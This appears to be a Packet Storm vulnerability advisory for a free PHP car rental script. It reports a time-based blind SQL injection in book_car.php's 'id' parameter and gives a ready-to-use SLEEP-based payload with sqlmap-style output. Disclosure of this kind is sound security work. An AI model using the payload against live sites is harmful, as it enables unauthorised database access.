Car Rental Script from projectworlds.in suffers from a remote SQL injection vulnerability. Versions are not provided with this software currently.
1be6126b3c521accdf335f500e3ccfed74329e68075435dfe14474c37b354458====================================================================
Car Rental Script - Time-based blind SQL injection
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date: : 8/8/2020
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP
####################################################################
===[ Exploit ]===
[*] SQL injection
=================================
https://localhost/testing/book_car.php?id='[payload<https://localhost/testing/book_car.php?id='%5bpayload>]
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed